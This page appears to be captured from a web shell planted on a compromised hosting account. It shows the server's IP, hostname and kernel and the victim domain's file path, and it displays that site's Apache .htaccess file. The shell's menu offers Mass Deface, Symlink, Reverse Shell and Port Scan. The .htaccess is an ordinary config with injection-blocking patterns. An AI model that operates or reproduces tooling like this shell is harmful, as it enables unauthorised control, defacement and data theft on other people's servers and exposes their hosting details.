Tul xxx Tul
User / IP
:
216.73.216.217
Host / Server
:
45.84.207.204 / aircan.me
System
:
Linux lt-bnk-web1726.main-hosting.eu 5.14.0-611.36.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Mar 3 11:23:52 EST 2026 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
u931257429
/
domains
/
ecomercial.me
/
public_html
/
Viewing: .htaccess
# eComercial - Configuración Apache # Versión: 2.1 Mobile-First # Página de inicio DirectoryIndex index.php index.html # Habilitar RewriteEngine RewriteEngine On # Redirección de index.html a index.php RewriteRule ^index\.html$ index.php [L] # Portal publico de clientes RewriteRule ^cliente/([^/]+)/([^/]+)/?$ portal.php?slug=$1&token=$2 [L,QSA] RewriteRule ^cliente/([^/]+)/([^/]+)/factura/([0-9]+)/?$ portal-invoice.php?slug=$1&token=$2&order=$3 [L,QSA] RewriteRule ^cliente/([^/]+)/([^/]+)/media/([0-9]+)/?$ portal-media.php?slug=$1&token=$2&content=$3 [L,QSA] RewriteRule ^cliente/([^/]+)/([^/]+)/descargar/([0-9]+)/?$ portal-download.php?slug=$1&token=$2&content=$3 [L,QSA] RewriteRule ^regalo/([^/]+)/?$ gift.php?token=$1 [L,QSA] RewriteRule ^regalo/([^/]+)/media/?$ gift-media.php?token=$1 [L,QSA] RewriteRule ^regalo/([^/]+)/descargar/?$ gift-download.php?token=$1 [L,QSA] # Bloquear carpetas no publicas si llegan a quedar en el hosting RewriteRule ^(NO_SUBIR|app|config|database|vendor|backups|deployment|docs|scripts|src|tests)/ - [F,L] # Forzar HTTPS (descomentar en producción) RewriteCond %{HTTPS} off RewriteCond %{HTTP_HOST} !^(localhost|127\.0\.0\.1)(:[0-9]+)?$ [NC] RewriteRule ^(.*)$ https://%{HTTP_HOST}%{REQUEST_URI} [L,R=301] # Protección contra acceso directo a archivos sensibles <FilesMatch "\.(sql|md|log|ini|sh|bak|backup)$"> Order allow,deny Deny from all </FilesMatch> # Proteger archivos de configuración <Files "database.php"> Order allow,deny Deny from all </Files> # Comprimir archivos (si mod_deflate está disponible) <IfModule mod_deflate.c> AddOutputFilterByType DEFLATE text/html text/plain text/xml text/css text/javascript application/javascript application/json </IfModule> # Caché del navegador (si mod_expires está disponible) <IfModule mod_expires.c> ExpiresActive On ExpiresByType image/jpg "access plus 1 year" ExpiresByType image/jpeg "access plus 1 year" ExpiresByType image/gif "access plus 1 year" ExpiresByType image/png "access plus 1 year" ExpiresByType image/webp "access plus 1 year" ExpiresByType image/svg+xml "access plus 1 year" ExpiresByType text/css "access plus 1 month" ExpiresByType application/javascript "access plus 1 month" ExpiresByType application/pdf "access plus 1 month" ExpiresByType audio/mpeg "access plus 1 month" ExpiresByType video/mp4 "access plus 1 month" </IfModule> # Seguridad adicional <IfModule mod_headers.c> # Prevenir clickjacking Header always set X-Frame-Options "SAMEORIGIN" # Prevenir MIME sniffing Header always set X-Content-Type-Options "nosniff" # Habilitar XSS protection Header always set X-XSS-Protection "1; mode=block" # Referrer policy Header always set Referrer-Policy "strict-origin-when-cross-origin" </IfModule> # Deshabilitar listado de directorios Options -Indexes # Proteger contra inyección de código <IfModule mod_rewrite.c> RewriteCond %{QUERY_STRING} (<|%3C).*script.*(>|%3E) [NC,OR] RewriteCond %{QUERY_STRING} GLOBALS(=|[|%[0-9A-Z]{0,2}) [OR] RewriteCond %{QUERY_STRING} _REQUEST(=|[|%[0-9A-Z]{0,2}) RewriteRule ^(.*)$ index.php [F,L] </IfModule>
Coded With 💗 by
0x6ick